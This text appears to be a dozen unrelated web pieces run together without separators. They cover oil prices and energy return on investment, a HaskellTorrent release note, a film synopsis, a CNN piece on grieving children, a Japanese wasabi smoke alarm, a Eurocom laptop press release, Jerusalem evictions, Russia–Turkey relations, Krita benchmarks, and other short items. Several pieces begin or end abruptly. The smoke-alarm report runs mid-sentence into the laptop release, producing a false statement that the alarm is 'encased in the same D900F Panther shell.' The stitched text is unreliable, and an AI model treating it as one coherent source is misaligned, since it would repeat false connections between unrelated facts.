In the 1970s analyses were undertaken by Bullard , Hannon , Herendeen [ 24 ] and Costanza [ 25 ] that showed that ( except for energy itself ) it does not matter enormously where money is spent within final demand due to the complex interdependency of our economy ( that is , the final products that consumers buy are relatively unimportant to overall GDP / energy efficiency because there are so many interdependencies , i.e. each sector purchases from many others within our economy , although this does not apply to the intermediate products purchased by manufacturers ) .
According to Costanza [ 25 ] , the market selects for generating a similar amount of wealth per unit of energy used within the whole economic “ food chain ” leading to final demand .
While this is not exactly true it is close enough for our present purposes and it is certainly true for the average of all economic activity .
What is the energy “ price ” of the oil in this example to 1 ) the country ( either domestic or if it is imported ) and 2 ) to the consumer -- relative to the total economic activity of each entity ?
One can do some simple math .
There are about 6.1 GJ in a standard 42 gallon barrel of oil , so the 105 EJ of industrial energy the U.S. uses to run its economy for a year is equivalent to roughly 17 billion barrels of oil .
At $ 70 per barrel that amount of oil would take 1.2 trillion dollars to purchase ( or at 3 dollars a gallon , 2.1 trillion to the consumer ) , which is either about one tenth of GDP , or one sixth if we consider it from the perspective of the consumer ( the difference between the two estimates going to the oil companies after production or to refineries , gas station attendants etc. as inputs , profits , wages , delivery costs etc. ) .
Thus the price of energy delivered to the consumer is roughly twice that of the wellhead price ( or much more if converted to electricity ) .
Now assume that the real price of oil , that is the price of oil relative to other goods and services , increased by two , that is to $ 140 a barrel in today ’s dollars ( which it did briefly in 2008 ) , and that the total size of the economy stayed the same – that is some other components of the economy were diverted to pay for that oil .
If that happened , then one fifth ( 17 billion times 140 = $ 2.38 trillion / 12 trillion ) of the economy would be used to buy the oil to run the other four fifths ( that is that part not including the energy extraction system itself ) .
If the price of oil increased to $ 250 per barrel , about one third of all economic activity would be required to run the other two thirds , and at $ 750 a barrel then the output of the entire economy , that is 12 trillion dollars , would be required to generate the money to purchase the energy required to run the economy , i.e. there would be no net output .
While in fact in a real economy there would be many adjustments , alternative fuels and nuances this analysis does at least give an overview of the relation of gross to net economic activity , and the importance of EROI in energy and economic terms to the rest of the economy .
As the price of fuel increases ( or as its EROI declines ) there are large impacts on the rest of the economy .
These impacts can be especially influential because changes in the price of energy tend to impact discretionary , not base , spending .
Of course most of our energy costs less than oil so that the 70 dollars a barrel we used in the example above translates to – in the real economy -- the equivalent of about $ 35 a barrel equivalent at the source or $ 70 a barrel by the time the consumer gets the energy , hence we can assume for this scenario that on average about 10 percent of the dollar economy ( i.e. $ 70 times 17 billion barrels or 1.2 trillion out of 12 trillion dollars ) is used just to purchase the energy that allows the rest of the economy to function , which produces the end products we want .
This 10 percent of our economic activity means that roughly ten percent of all workers ’ time , ten percent of the energy used in their jobs , and ten percent of the total materials consumed were used in some sense to simply get the energy to the final consumer to make the rest of the economy work .
According to the official statistics of the U.S. Energy Information Agency in 2007 the cost of energy to the consumer was about 9 percent of the total U.S. economy Figure 1 ) , so our numbers seem about right on average .
[ Haskell - cafe ] ANN : HaskellTorrent v0.1.1
Hello Cafe , I am pleased to announce yet another release of the HaskellTorrent project .
In this release , focus has been on improving upon the work laid in v0.0 .
Highlights include : * Certain data structures have changed from Data .
List to Data .
IntSet , yielding much improved performance .
* Addition of a GetOpt option parser . * Use of test - framework to run unit -tests .
* Assertion optimization , cutting down CPU usage by quite a margin .
* Change SHA1 checksumming to use Peter Simons hopenssl package .
This plugged some serious memory leaks .
* Support for listen ( ) on port 1579 so incoming connections get handled correctly .
* Support for more graceful stopping .
The supervisor tree is now terminated in the opposite order of creation .
*
When closing down , tell the tracker we are stopping .
* Add KeepAlive messages on idle socket connections .
* Improve the console interface a bit so it is quasi-usable .
* Change the logging framework from my own to hslogger by John Goerzen .
It is better than my attempts and it shaves 150 lines of code from the project not having to maintain a logging framework .
This also makes the client BEP003 compliant , so we can now claim to be a full BitTorrent client .
Looking forward , I 'd like to get less CPU usage , and support for more BitTorrent extensions . --
There are still bugs in the code , so watch out for spinning processes .
Also , performance is still far from optimal .
From a profiler run , we get the following : total time = 64.26 secs ( 3213 ticks @ 20 ms ) total alloc =
6,712,153,496 bytes ( excludes profiling overheads ) COST CENTRE MODULE % time % alloc MAIN MAIN 58.0 3.7 assertPieceDB Process .
PieceMgr 13.4 29.6 logP Process 3.7 6.0 syncP Process 2.8 12.1 download Main 2.1 0.0 updateBS Digest 2.1 0.0 recvP Process 2.0 4.3 chooseP Process 1.9 7.0 receiverP Process .
Peer 1.8 1.5 peerP Process .
Peer 1.2 0.6 grabBlocks ' Process .
PieceMgr 1.0 3.1 senderP Process .
Peer 1.0 1.4 sendP Process 0.9 3.1 checkPiece FS 0.7 6.1 msgPeer Process .
ChokeMgr 0.6 2.4 registerL Process .
Timer 0.2 1.9 getByteString Data.Serialize .
Get 0.2 1.0 newBuffer Data.Serialize .
Builder 0.0 10.1 which tells us we are still allocating far too much memory .
I wonder what the 58.0 % on MAIN means ( this is with - prof - auto - all - caf - all ) .
The code is heavily concurrent , using the cml package .
My guess is that we have somewhere between 500 and 1000 threads when running .
I ponder if that has something to do with it .
The price of assertPieceDB can easily be removed by running the assertions at a rarer pace .
-- J.
A few incidents that happen at 11:14 p.m. in the town of Middleton are seen from five different perspectives , each of the players who generally works toward self interest , not caring about the consequence to other people , and in the process exacerbating the situations by his or her actions .
Jack , in town to meet someone , is a chronic drinker and driver , he still doing so despite having his license temporarily suspended .
Teens Mark , Eddie , and Tim are out for a joyride in Mark 's van , they generally causing havoc all in the name of having fun , that is until something goes wrong .
Frank , out for a walk with his dog , stumbles across something which makes him jump to a conclusion about his daughter , to whom he is both overprotective and overly trusting .
Duffy , who works as a clerk at Lloyd's EZZZ Stop convenience store , goes to the store just as it is closing to ask his friend , the clerk on duty , Buzzy , for a favor , which may be difficult for her to grant based on her own needs , and Cheri ... Written by Huggo
( CNN ) --
As Elizabeth Sullivan stood on the field at Comfort Zone Camp , staring out at the " normal " kids playing ice - breaker games and elbow tag , she realized , " It 's OK to have fun . "
Six months earlier , she lost her father when he collapsed while jogging at night .
He died in the ambulance on the way to the hospital .
The 12 - year - old never got to say goodbye .
But not all of the one in seven Americans who lose a parent or sibling before the age of 20 learn to cope the way Sullivan has .
In fact , 73 percent of adults believe that their lives would have been " much better " had their loved ones not died when they were young , according to a survey released Monday by Comfort Zone Camp , a nonprofit provider of childhood bereavement camps , and Matthew Greenwald and Associates Inc .
Of the 1,006 adults surveyed , 110 had lost a parent before the age of 20 , 52 lost a sibling , and 13 lost both .
Participants had to be at least 25 years old to take part in the poll , which was conducted between November and December via the Internet .
The margin of error is plus or minus 3.2 percentage points .
The majority of participants agreed that they would trade one year of their life for one more day with their departed parent .
However , about 59 percent of people who lost a parent at a young age think they have become stronger as a result , saying that losing a loved one gave them a greater appreciation of family relationships .
There is not one way to interpret each individual 's idea of " much better , " said Pete Shrock , national program director at Comfort Zone .
But with any loss , life is going to be different ; however , that does n't necessarily mean it 's going to be worse .
" The family is a unit , and everyone plays a significant role in how that family communicates and works .
...
It 's like a link in a chain , " he said .
" When you move that link -- it does n't matter if it 's directly in the middle , to the left or the right -- there 's a disruption in the chain , and it will never be the same . "
About 85 percent of parents who lost a spouse said they wish there were more resources for their grieving children .
Kate Killion does , too .
Killion , 53 , who lost her father suddenly when she was 8 years old , said there were very few bereavement services available for children in the 1960s .
" People did n't recognize how children process death and grief , " she said .
" The adults in my life tried to protect me by not talking about it .
They thought I would n't think about it as much .
That is n't the case .
Giving children the chance to express their feelings and help them process [ loss ] is so important . "
Killion started dealing with the loss when she was in her 20s by talking openly about her father -- something she could not do with her mother , who shut down after her father 's death .
Killion said her brother , who was 12 at the time , never found the support she found .
" He just closed up .
He 's that way to this day , " she said .
" That 's how much it changes your life .
He was a vulnerable , confused little boy , and he still has n't dealt with it .
It stays with you forever unless you can really go there and deal with it . "
Not only do siblings tend to deal with the same loss differently , there are many differences in the ways men and women handle grief , Shrock said .
While 38 percent of the women surveyed for Comfort Zone 's study " strongly agreed " that " losing a parent was the toughest thing [ they 've ] had to deal with , " only 29 percent of men agreed .
Daddy 's little girl is going to react differently to the loss of her father than the young man who just lost the person who was supposed to teach him to play catch and drive a stick shift , Shrock added .
Milestones such as proms , graduations and weddings are among the top concerns for many children and young adults .
But for Sullivan , now 23 , it 's more about the little things , like going to a college football game .
It 's all about learning how to cope , she said , which she finally managed to do while making breakfast eight years after her father 's death .
She was making pastina , an Italian dish she and her father used to make together .
After cracking an egg over the tiny pieces of pasta and butter in her pot , she began to stir quickly so the egg would spread before everything congealed .
" When we used to make it before I went to school , he would cheer me on and tell me to stir faster , ' stir , stir , stir , ' " she said .
" Making that pasta and thinking about him cheering me on and laughing was the most connected I 've been able to feel to him .
That 's when I realized how I need to cope : by doing the things that make me feel connected . "
There are always going to be good days and bad days , she said .
" I remember a lot of people telling me initially that I should write in a journal .
That was n't for me at the time .
It 's important not be afraid to try things and figure out what works for you .
Be willing to talk to people ....
There 's not a right or a wrong way to grieve . "
The Japanese are renowned for developing some of the most innovative gadgets and new technologies in the world .
Now one company has developed a new type of smoke alarm for deaf people .
It uses the pungent smell of wasabi , a common ingredient in sushi .
Roland Buerk reports from Tokyo .
Transcript
Roland Buerk :
Anyone who has eaten sushi will know all about the flavour it can have - a very mustardy , peppery , horseradish .
That 's caused by this green paste inside , it 's called wasabi .
If you have too much wasabi it can get right up your nose and make your eyes water .
Wasabi is made by grinding down a very pungent root .
And it was perhaps while eating in a restaurant like this one the researcher came up with an idea about what this beloved ingredient in Japanese food could be used for .
And this is what they came up with .
What it is is a smoke alarm for the deaf , for people who would n't be able to hear the noise of a normal alarm .
This one detects smoke , it emits a stream , a jet of extract of wasabi .
We 'll give it a go .
( Presses button on fire alarm )
( Alarm makes siren sound and emits wasabi extract )
Roland Buerk : Now , it really is a very strong , horseradishy , almost garlicy smell that catches your nose and the back of your throat .
Chigusa Shimokawa is from the company that has developed this product .
We 're awake and we can smell it strongly , but if you were asleep would it wake you up ?
Chigusa Shimokawa : Yes of course .
Roland Buerk :
How quickly does it wake you up ?
Because that 's crucial in a fire is n't it - how quickly you get out of the burning building ?
Chigusa Shimokawa : Most people will wake up within one or two minutes .
Roland Buerk :
In the course of developing this product , they tried lots of different smells - banana , this one is coconut milk , this is tea tree oil - that 's a pretty strong smell too .
But in the end they found the best odour for waking people up was a humble wasabi root .
It 's encased in the same D900F
Panther shell , which is a large machine with enough room to hold these high - powered processors and not melt - down completely .
The machine is finally shipping now for prices that are far higher than most are willing to pay .
Eurocom launches the world 's first 6 - cores based notebook with Intel i7-980X Extreme Edition and Xeon W5680 , up to 2.6TB of storage with four physical hard drives and up to 24GB of DDR3 - 1333 Triple - Channel Memory !
The official launch is scheduled today in Las Vegas during NAB Expo .
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Eurocom , the world 's leading developer of highly personalized , high - performance notebook PCs and energy efficient All - in - One PCs , updated the EUROCOM D900F Panther Mobile Workstation to support the newest line of 32nm Intel 6 - cores processors and D900F Panther Mobile Server to support line of XEON W56xx processors .
EUROCOM Phantom series is perfect for Software and Database Developers , Graphics , Photography , Gaming , 3D Modeling , CAD , CAM , CAE , Digital Content Creators , engineeres and anyone demanding maximum power , storage and video , or Mobile Server platform running Microsoft Hyper - V capable to virtualize and run any O/S from Windows 7 or Server 2008 up to Red Hat or Solaris
The EUROCOM D900F PANTHER Mobile Workstation combines Eurocom engineering , Intel horsepower , and professional nVidia Quadro FX 3800M OpenGL graphics in a package that can easily handle demanding engineering and visualization workloads .
It delivers 64 - bit workstation - class performance and functionality in a mobile form factor with laptop convenience , anywhere you go .
It is designed to replace traditional desktop based workstation by providing " anywhere you go workstation " capabilities and allows companies to implement RED ( Rapid Engineering Deployment )
Team solutions .
Designed for real - world application performance , reliability , and cool operation EUROCOM D900F PANTHER Mobile Workstation is perfect for running most of 64 - bit Operating Systems .
By supporting more operating systems than any workstation in its class , the EUROCOM PANTHER gives professional users maximum flexibility .
In addition to Microsoft Windows 7 , XP Pro64 , Server 2003 or Server 2008 , the EUROCOM D900F PANTHER supports RedHat , Linux , Open Solaris and other server - class operating systems , enabling SMB customers to use the system for virtualization as Mobile Server .
And that means mobile capabilities of launching 64 - bit workstation On - the - Go or Virtual server On - the - Go applications from the convenience of a laptop , wherever , whenever work needs to be done .
Mobile Server is a new category of Eurocom notebooks designed with a professional user in mind .
Software and / or database developers , training centers , military personnel , emergency relief organizations and service organizations who must frequently travel , yet need access to powerful computing , are the core target for Mobile Servers .
With unrivaled power , unsurpassed features and unmatched style , the Mobile Servers are the ultimate extension of the Eurocom Mobile Workstation notebook technology .
With the release of mobile servers , EUROCOM has taken the next step in the evolution of the desktop replacement and workstation by combining server like features , power , reliability and flexibility with desktop replacement technology .
Mobile Server is the most powerful notebook on the market .
It is engineered for the highest quality , best performance , long - term stability and latest computing technology .
Mobile Server features the most innovative and stable computer technologies available on the market such as the fastest processors , x64 Operating Systems , the most advanced VGA technology , multiple optical drives and multiple Hard Drives offering RAID 0/1/5/10 , large displays and full size 102 - key keyboards .
The EUROCOM PANTHER , which measures 15.8 " x 11.9 " x 2.05 " and weights under 12 lbs , also supplies tremendous storage ( up to 2.6TB using four hard drives ) .
Customers may also choose between RAID 0 , RAID 1 , RAID 5 or RAID 10 for the ultimate transfer rates and application load times or redundancy .
" It 's a server or workstation class computer complete with built - in Uninterrupted Power Supply ( UPS ) in a 12 pounds notebook form factor , " said Mark Bialic , President of Eurocom .
" This is one extremely fast notebook that offers server or workstation calibre capabilities .
It is designed to replace traditional desktop based workstations .
It offers incredible high ROI by allowing companies to be more productive and offers new " on the go " Rapid Engineering Deployment ( RED ) services while greatly reducing overall IT management costs " .
Featuring workstation - class or server - class Intel Core i7 or Xeon Processor and up to 24GB of DDR3 - 1333 memory , the D900F PANTHER also offers the largest storage capacity on the market today - a whopping 2.6 Terabytes with four physical drives and RAID 0/1/5/10 - making it the perfect mobile workstation or server laptop for users who demand extra-large capacity storage and reliability for true portable server / workstation experience .
EUROCOM PANTHER supports super- powerful 6 - cores 3.33 GHz Intel Core i7-980X Processor Extreme Edition or 3.33 GHz
Intel XEON W5680 processors running at 6.4GT / sec bus speed with 8MB L3 cache , Gigabit Ethernet port on - board , HDMI , eSATA , DVi Dual Link ports , with a 17 " WUXGA LCD display and full size keyboard .
If required 2nd Gigabit Ethernet can be added via Express Card expansion slot .
Eurocom offers both regular hard drives with G - Force sensors as well as Solid State Drives SLC and / or MLC with capacity of 1TB per drive .
PROCESSOR TECHNOLOGY :
Driving the system is the newest line of Intel Core i7 processors up to 3.33 GHz Extreme Edition i7-980X and bus speeds of up to 2 x 6.4GT / sec and 8MB of L3 cache , which delivers exceptional multi-tasking and multi- threaded performance .
There are 6 different CPU choices available :
(1) i7-930 2.80 GHz Intel Core i7 Processor ; 8MB L3 cache ; 4.8GT/s ; LGA1366 ; 32nm ; 130W
(2) i7-960 2.93 GHz Intel Core i7 Processor ; 8MB L3 cache ; 4.8GT/s ; LGA1366 ; 45nm ; 130W
(3) i7-980X 3.33 GHz Intel Core i7 Processor Extreme Edition ; 6 - cores ; 8MB L3 cache ; 6.4GT/s ; LGA1366 ; 32nm ; 130W
(4) W5680 ; 3.33 GHz Intel Xeon Processor ; 6 - cores ; 8MB L3 cache ; 6.4GT/s ; LGA1366 ; 32nm ; 130W
(5) X5670 2.93 GHz Intel Xeon Processor ; 6 - cores ; 8MB L3 cache ; 6.4GT/s ; LGA1366 ; 32nm ; 95 W
(6) W5590 3.33 GHz Intel Xeon Processor ; 8MB L3 cache ; 6.4GT/s ; LGA1366 ; 45nm ; 130W
Eurocom offers full processor upgradeability allowing users to update their processors as technology changes and / or if higher performance is required .
VGA TECHNOLOGY
Eurocom offers multiple choices of high performance VGA cards based on standard MXM 3.0 Type B specifications , easy to upgrade by professional user :
a ) 1GB GDDR3 ; GTX 285M Nvidia GeForce ; DX10 ; MXM 3.0 Type B ; 16 x PCIe ; N11E - GTX1
b ) 1GB GDDR3 ; nVidia Quadro FX 2800 M ; OpenGL ; DVI Dual Link ; MXM 3.0 b ; N10E - GLM
c ) 1GB GDDR3 ; nVidia Quadro FX 3800 M ; OpenGL ; DVI Dual Link ; MXM 3.0 b ; N10E - GLM3
d ) 1GB GDDR5 ; HD5870 ATi Radeon Mobility ; DX 11 ; DVI Dual Link ; MXM 3.0 b
Eurocom offer full VGA Upgradeability allowing users to upgrade their VGA technology as technology changes ( i.e. DX11 ) and / or higher VGA performance is required ( i.e. Quadro or SLI / Crossfire )
DEFINITION of MOBILE WORKSTATION
Mobile Workstation is a new category of notebooks designed to replace a desktop - based workstation for a professional user .
With unrivalled power , unsurpassed features and portability , the Mobile Workstation is the ultimate evolution of the Desktop Replacement notebook .
With the release of mobile workstations , Eurocom has taken the next step in the evolution of the desktop replacement by combining workstation like features , power and flexibility with desktop replacement technology .
Mobile Workstation is the most powerful notebook on the market .
With the arrival of 64 - bit Operating System technology , mobile workstations run two times faster 64 - bit applications than 32 - bit desktop PCs .
Featuring the most innovative computer technologies ; they are engineered for the highest quality , best performance , long - term stability and serviceability .
As a single computing solution , mobile workstation provides a perfect alternative to a traditional workstation class desktop computer system .
" It 's a server or workstation class computer complete with built - in Uninterrupted Power Supply ( UPS ) in a 12 pounds notebook form factor , " said Mark Bialic , President of Eurocom .
" This is one extremely fast notebook that offers server or workstation calibre capabilities .
It is designed to replace traditional desktop based workstations .
It offers incredible high ROI by allowing companies to be more productive and offer new " on the go " Rapid Engineering Deployment ( RED ) services while greatly reducing overall IT management costs " .
At the heart of the neighborhood lies a shrine held by Jews to be the ancient tomb of Shimon Hatzadik , or Simeon the Just , a Jewish high priest from the days of the Second Temple .
A small Jewish community lived in the compound around the tomb from the late 19th century ; the last remnants left during the hostilities leading up to the establishment of Israel in 1948 , after which the area fell under Jordanian control .
In the 1950s , Jordan and the United Nations agency for Palestinian refugees gave 28 refugee families homes there .
The families say that Jordan promised them full ownership , but the houses were never formally registered in their names .
In the early 1970s , the Israeli courts awarded two Jewish associations ownership of the compound based on land deeds that were a century old .
The Palestinian residents were allowed to stay on as protected tenants on the condition that they paid rent to the Jewish groups .
Rejecting the court ruling , many of the Palestinian families refused to pay rent , making them eligible for eviction .
Their lawyer claimed that the Jewish land deeds were forged but was not able to convince the Israeli courts .
Now Maysoun and Nasser Ghawi and their five children , the youngest 2 years old , spend their days in a protest tent on the sidewalk .
The Palestinian Authority has rented them a small apartment in the northeast of the city , but Ms. Ghawi says they have been sleeping there only to escape the bitter cold .
“ We have to be planted here , ” Ms. Ghawi said one recent weekday , shortly after the protest tent had been confiscated by the Israeli police and rebuilt by neighbors and activists , as has happened several times .
“ I never thought we would be on the street , ” she added .
“ We have been living here for 53 years . ”
The Ghawis came to Jerusalem as refugees from the village of Sarafind , now Tzrifin , in central Israel .
But they , like other Palestinians across the 1967 lines , cannot go to court to reclaim lost property because of what some describe as an asymmetry in the Israeli law .
Over the last five years the UK , US and other countries have written off billions of dollars in loans to the world 's poorest countries in an attempt to make poverty history .
But a small group of ruthless financiers - the vulture funds - have been trying to divert that money into their own pockets .
Greg Palast reports on their latest target , Liberia , and on moves by UK MPs , prompted in part by a previous Newsnight investigation , to outlaw such funds .
In many ways , Russia and Turkey are natural partners .
Both feel slighted by the West .
Both are nostalgic for past imperial glory .
And both are ruled by governments pledging to restore the countries ' former greatness .
When Turkish Prime Minister Recep Tayyip Erdogan arrives in Moscow for a two - day visit , it will mark the latest stage in a long courtship between once bitter rivals .
Officially , the volatile South Caucasus region and energy cooperation will top the agenda as Erdogan huddles with both Russian Prime Minister Vladimir Putin .
But the broader subtext of Erdogan 's visit will be the deepening entente between Moscow and Ankara that has emerged in recent years after centuries of conflict .
Analysts say the development is natural for two ambitious countries located on the West 's periphery , both politically and geographically .
" You can see convergence " between Russia and Turkey , says Bulent Alireza , director of the Turkey Project at the Center for Strategic and International Studies in Washington .
" Both are Eurasian countries .
Both are on the outside .
And both are trying to redefine their relationship with Washington . "
Alireza says the Russo - Turkish relationship has " an energy backbone " that originated in the final years of the Soviet Union , when Moscow began delivering gas to Turkey .
Since then , he says it expanded into diplomatic cooperation in the Middle East and the Caucasus .
Analysts dismiss fears in the West that this still developing relationship could turn into a full - fledged alliance .
All the same , observers say the days appear to be over when Turkey -- a key NATO member state -- could be counted on to toe the Western line .
" Where this is problematic for the West is that the assumption that people had for many years -- that Turkey was automatically going to follow the policy line that the U.S. , Europe , and NATO wanted -- is not the case anymore , " says Nikolas Gvosdev , a Russia expert and professor of national security studies at the U.S. Naval War College .
" Turkey is pursuing a much more independent course these days .
And unless it sees something is in its interests , it is not going to automatically assume that what Washington wants is what Ankara ought to do . "
Hedging Their Bets
That became abundantly clear during Putin 's visit to Ankara in August , when Turkey granted Russia 's state - run natural - gas monopoly Gazprom use of its territorial waters in the Black Sea , where Moscow wants to route its South Stream pipeline to deliver gas to Eastern and Southern Europe .
In exchange , Gazprom agreed to build a pipeline across Turkey from the Black Sea to the Mediterranean .
The agreements advanced Turkey 's longstanding goal of becoming an energy hub .
But it also marked a severe blow to the European Union - backed Nabucco pipeline project , a Western effort to decrease Europe 's energy dependence on Russian energy by transporting gas from the Caspian Sea area to Europe via Turkey .
Analysts say Turkey 's move is easy to justify .
The Nabucco project , chronically underfunded and continuously delayed , has been slow to get off the ground .
And while Turkey insists it has n't abandoned its plans for Nabucco , it is also clearly choosing to hedge its bets by dealing with Moscow .
" Turkey is pursuing its own interests pragmatically , " says Tabib Huseynov , head of the International Crisis Group 's Baku office .
" The Turks see that there is no improvement on the Nabucco front .
That is why they want to make sure they are n't putting all their eggs in one basket and just counting on Nabucco for their energy security .
They also want to make sure other options are available . "
During Putin's visit , Russian and Turkish energy companies agreed to form a joint venture to build electric power plants in Turkey .
Analysts say Russia 's strategy in Turkey resembles its approach to Germany , where Moscow has enticed the country 's business and political community with lucrative projects .
One such example is a joint venture , forged during the same Putin visit last August , to build electric power plants in Turkey .
" What is interesting is the emergence in Turkey -- as you have had in Germany and elsewhere -- of a pretty consistent business lobby that has a stake in good relations with Russia , wants the trade and development to continue , and can survive changes in governments and politicians , " Gvosdev says .
" So you have the possibility that you can lay the framework for pretty close relations . "
Crowding Out The West
Those relations extend beyond energy and business ties as well .
Russia played a key role in facilitating Turkey 's decision last autumn to take the first steps toward restoring relations with Armenia , which were severed over the Nagorno - Karabakh conflict in the early 1990s .
The resolution of the long - standing Karabakh impasse remains high on Turkey 's foreign policy agenda .
While in Moscow , Erdogan is expected to ask Putin to take a more active role in pushing for a settlement in the territory , which is legally part of Azerbaijan but occupied and controlled by Armenia .
Ankara has long wanted Russia to pressure Armenia to reach a settlement with Azerbaijan , a close ally of Turkey .
Russian Foreign Minister Sergei Lavrov is traveling to Armenia today , possibly to soothe -- or stoke -- anxieties in Yerevan that Turkey may be pushing for concessions from Armenia .
While Russia takes a proprietary interest in its South Caucasus neighborhood , it has been sanguine when it comes to Turkey 's growing influence there .
Analysts say , however , that Moscow is prepared to use Turkey to diminish the regional influence of the West , and particularly of the United States .
" For Russia , this is part of a strategy to squeeze out European and American influence from the South Caucasus .
Russia wants to see Turkey 's growing role as a counterweight to European and American influences in the region , " Huseynov says .
Russia and Turkey are also converging on Iran , where both oppose Washington 's tough line toward the Islamic Republic 's nuclear program .
" Turkey wants to be a more powerful voice in Middle East affairs , and Russia wants to do the same , " says Taylan Bilgic is a correspondent for the " Hurriyet Daily News " in Istanbul .
" Turkey 's positions , especially this government 's positions , on Middle East affairs has become contrary to the Washington line .
This is also consistent with Russia 's position . "
A Spurned Suitor
The relationship still has its fair share of irritants .
Ankara and Moscow remain competitors in the Balkans .
Russia continues to support its traditional Orthodox Christian ally , Serbia , while Turkey backs the predominantly Muslim Bosniaks and Kosovo Albanians .
The Russian State Duma has also recognized as genocide the massacre of an estimated 1.5 million Armenians by Ottoman Turks at the end of World War I -- a highly contentious point with Turkey , which firmly rejects the classification .
Still , there is presently more that binds the two countries than divides them .
Analysts say one of the key factors driving Turkey into Moscow 's embrace was a sense that Ankara 's longstanding bid to join the European Union is no longer being seriously considered .
Gvosdev says the " siren song " emanating from Moscow is that Turkey 's EU bid was " a sort of pipe dream , " and that Ankara should look north , rather than west , for opportunities .
" The Kremlin is seizing on the sense that Turkey is a spurned suitor of the West , or at least the European Union , and is trying to turn that to its advantage , " Gvosdev says .
" Had the talks for Turkish accession to the European Union since 2003 been much more positive than they have , then you would see a lot less room for Moscow to move in .
But the vacuum opened up , and Moscow is trying to fill it . "
Not all observers see cause for alarm in the new Russo - Turkish entente .
Alireza of the U.S. Center for Strategic and International Studies , for one , says Turkey 's openness to Russia dovetails neatly with U.S. President Barack Obama 's policy of " resetting " Washington 's relations with Moscow .
" [ Turkey ] is trying to balance its relations with the United States , the Europeans , and the Russians -- not just in the energy sector , but also further afield , " Alireza says .
" From the Turkish point of view , the ideal solution would be for Washington not to oppose what it is doing with Moscow , but perhaps to takes advantage of it , as it redefines its own relationship with Moscow away from a zero- sum game . "
I finished all my exams on time , so last Monday I could starting working full - time on Krita .
I ’ve now been at it for a full week !
How does it go ?
First week according the plan was aimed at measuring the speed of Krita .
We talked about our bottlenecks on IRC regulary .
We also talked about them in Oslo .
But we did n’t have any numbers .
Sven Langkamp did some benchmarks using QTime on iterators , there were some performence tests scattered in unit tests etc .
Boudewijn has decided to use new benchmark features from Qt4.6 .
So I wrote 10 benchmark classes where we benchmarked stuff like internal data memory management for images – our tile engine .
Some access classes which access pixels for use called iterators .
They allow to iterate over pixels in various ways .
Vertically , horizontally , in small rectangles , randomly etc .
Another important thing is compositing .
That is the work of class called KisPainter ( something like QPainter in Qt but with different complicated features not available in QPainter ) .
We benchmarked the speed of bitBlt operation with two types of memory storage .
First is KisPaintDevice and second one is called KisFixedPaintDevice .
The later one is lightweight version of the first one .
It is similar to QPaintDevice in Qt but again with more complicated features .
Øyvind Kolås a.k.a. pippin , Gegl developer is around .
Pippin shared his knowledge about benchmarking with us on irc ( btw come and visit as at # krita on irc.freenode.
net )
We decided to make tests for blur and brightness / contrast filter .
The first one is convolution filter , the second one is here because we wanted to be able to compare to GIMP .
We also made a benchmark for the image projection .
The projection benchmark loads an image in Krita ’s native format , computes the whole image constructed from various types of layers like group , filter , adjustment layer etc. and in the end we again save the file into native Krita format .
Our focus through this plan is to speed up painting .
So we ca n’t avoid stroke benchmarks .
Thanks go to Sven Langkamp for his work on presets saving / loading .
Using paintop presets , we can use the benchmark code I did , for any paintop .
We benchmarked our autobrush default paintop .
It is most used paintop for digital painters .
I ’m very happy about this benchmark as I can test my other paintops easily , all I need to do is create a preset for any paintop , save it in Krita and run the benchmark with the preset .
There results of the benchmars are on our wiki .
So it looks :
The data manager , which is responsible undo /redo and basically for storing and retrieving data is fast .
It allows us to read / write data at very high speeds .
From 1333.3 Mb/s to 1628.4 Mb/s , according to the benchmark results .
We benchmarked on 4096×4094 RGBA image ( 64 Mb ) which was read / wrote 100 times .
For comparison memcpy for two buffers of the same size as the image we used is almost the same speed .
There is benchmark code for memcpy in KisDatamanagerBenchmark , you can try it yourself if you want
Horizontal and vertical iterators are 11 times slower then Rectangular iterator .
The reason is that there is no caching .
From valgrind logs we see that fetching and switching tiles is very slow , so we need to implement caching there .
Every 64 pixels a new tile is fetched and switched to .
Why ?
Our tile is size of 64 pixels .
This slow downs the iteration .
We will cache the both iterators to avoid switching and fetching .
We will cache tiles , we do n’t do that now .
The rectangular iterator is quite fast , does not offer so many opportunities to improve .
The random iterator on the other hand is the slowest one .
Again fetching and switching to tiles is expensive .
Some caching strategy would be handy for moving around the image .
But the use case for using the random accessor is different so the cache strategy should be somehow adaptive .
The random accessor is 13 - times slower than rectangular one .
The compositing operation also known as BitBlt of KisPainter is used very often .
There is room for improvements , because currently it uses a slow iterator – random iterator .
The speed is very decent , but we will try to make a lot faster .
Filters are very slow compared to GIMP .
At least according the numbers pippin provided .
But first we need to improve underlying issues like the aforementioned iterators to improve their performance .
We blur the image with speed of 0.8 Mb/s .
Here we need to optimize the convolution painter .
Also the speed could be better when we optimize the horizontal iterator .
Strokes are slow because of the recomputation of the brush mask is needed every dab – every time brush touches the canvas in certain point .
That ’s slow .
You can see from the valgrind log , that the math function atan2 is slow .
We have to cache the result to avoid this .
The conclusion at the end of the first week is that we need to cache iterators and cache the brush mask .
Some parts of Krita have very nice speed like the tile engine .
Then we have slow parts like iterators .
I think we can gather a good performance boost with our plan .
In February , I posted Calvin Klein Underwear ’s “ X ” spring / summer 2010 ad campaign featuring four sexy men : Kellan Lutz , Hidetoshi Nakata , Mehcad Brooks and Fernando Verdasco .
Today , WWD posted the video component of the campaign but beware if you ’re not watching the video at the comfort of your home because there ’s profanity .
Although the full - length video of the campaign has the profanity bleeped out by sound and by an X that appears over the mouth but it might also be too sexy for work lol .
Enjoy watching the SEXY men !
Roger L. Simon usefully posts a translation of a recent article from Ma'ariv , which reports that the U.S. is no longer regularly granting visas to Israeli scientists associated with the Dimona nuclear facility .
The best way to judge the strength and health of the relationship between Israel and the U.S. is not by watching what the Obama Administration says about the number of apartments Israel is building in East Jerusalem , but by watching how the Administration treats the unwritten forty - year - old agreement between the two countries that allowed Israel to avoid signing the Nuclear Non-Proliferation Treaty .
In exchange for reduced American pressure , Golda Meir promised Richard Nixon that she would keep her country 's nuclear program invisible , or at least " opaque . "
It is true that Bibi Netanyahu is skipping Obama 's nuclear summit because he fears an ambush by Egypt and Turkey , which both want Israel 's nukes on the table ( what they really want , of course , is nukes of their own , and who would n't ? ) , but Netanyahu would n't skip this meeting , I think , if he thought Obama had his back on opacity .
If Ma'ariv has it right , though , this aspect of the " special relationship " might be coming to an end .
UPDATE : Ben Smith is reporting that the White House is denying the Ma'ariv visa story .
